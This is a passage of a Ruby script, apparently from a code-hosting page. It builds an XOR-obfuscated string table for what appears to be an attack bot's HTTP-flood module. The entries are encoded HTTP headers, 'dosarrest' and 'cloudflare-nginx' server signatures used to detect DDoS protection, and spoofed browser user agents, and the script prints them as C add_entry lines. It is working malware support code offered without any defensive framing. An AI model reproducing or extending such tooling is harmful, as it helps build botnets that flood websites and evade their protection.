TABLE_ATK_LOCATION_HDR: "\x4e\x4d\x41\x43\x56\x4b\x4d\x4c\x18\x22",
|
||||
TABLE_ATK_SET_COOKIE_HDR: "\x51\x47\x56\x0f\x41\x4d\x4d\x49\x4b\x47\x18\x22",
|
||||
TABLE_ATK_CONTENT_LENGTH_HDR: "\x41\x4d\x4c\x56\x47\x4c\x56\x0f\x4e\x47\x4c\x45\x56\x4a\x18\x22",
|
||||
TABLE_ATK_TRANSFER_ENCODING_HDR: "\x56\x50\x43\x4c\x51\x44\x47\x50\x0f\x47\x4c\x41\x4d\x46\x4b\x4c\x45\x18\x22",
|
||||
TABLE_ATK_CHUNKED: "\x41\x4a\x57\x4c\x49\x47\x46\x22",
|
||||
TABLE_ATK_KEEP_ALIVE_HDR: "\x49\x47\x47\x52\x0f\x43\x4e\x4b\x54\x47\x22",
|
||||
TABLE_ATK_CONNECTION_HDR: "\x41\x4d\x4c\x4c\x47\x41\x56\x4b\x4d\x4c\x18\x22",
|
||||
TABLE_ATK_DOSARREST: "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4d\x51\x43\x50\x50\x47\x51\x56\x22",
|
||||
TABLE_ATK_CLOUDFLARE_NGINX: "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4e\x4d\x57\x46\x44\x4e\x43\x50\x47\x0f\x4c\x45\x4b\x4c\x5a\x22",
|
||||
TABLE_HTTP_ONE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
|
||||
TABLE_HTTP_TWO: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x13\x12\x0c\x12\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
|
||||
TABLE_HTTP_THREE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x13\x0c\x12\x0c\x10\x15\x12\x16\x0c\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
|
||||
TABLE_HTTP_FOUR: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x75\x4b\x4c\x46\x4d\x55\x51\x02\x6c\x76\x02\x14\x0c\x13\x19\x02\x75\x6d\x75\x14\x16\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x17\x11\x15\x0c\x11\x14\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x61\x4a\x50\x4d\x4f\x47\x0d\x17\x10\x0c\x12\x0c\x10\x15\x16\x11\x0c\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4b\x0d\x17\x11\x15\x0c\x11\x14\x22",
|
||||
TABLE_HTTP_FIVE: "\x6f\x4d\x58\x4b\x4e\x4e\x43\x0d\x17\x0c\x12\x02\x0a\x6f\x43\x41\x4b\x4c\x56\x4d\x51\x4a\x19\x02\x6b\x4c\x56\x47\x4e\x02\x6f\x43\x41\x02\x6d\x71\x02\x7a\x02\x13\x12\x7d\x13\x13\x7d\x14\x0b\x02\x63\x52\x52\x4e\x47\x75\x47\x40\x69\x4b\x56\x0d\x14\x12\x13\x0c\x15\x0c\x15\x02\x0a\x69\x6a\x76\x6f\x6e\x0e\x02\x4e\x4b\x49\x47\x02\x65\x47\x41\x49\x4d\x0b\x02\x74\x47\x50\x51\x4b\x4d\x4c\x0d\x1b\x0c\x13\x0c\x10\x02\x71\x43\x44\x43\x50\x4b\x0d\x14\x12\x13\x0c\x15\x0c\x15\x22"
|
||||
}
|
||||
|
||||
hashtable.each { |key, value|
|
||||
decode_value = []
|
||||
value.each_byte { |bite| decode_value << "\\x%02x" % (bite ^ 0x22) }
|
||||
puts "add_entry(#{key}, \"#{decode_value.join}\", #{value.length});"
|
||||
}
|
Loading…
Reference in New Issue
Block a user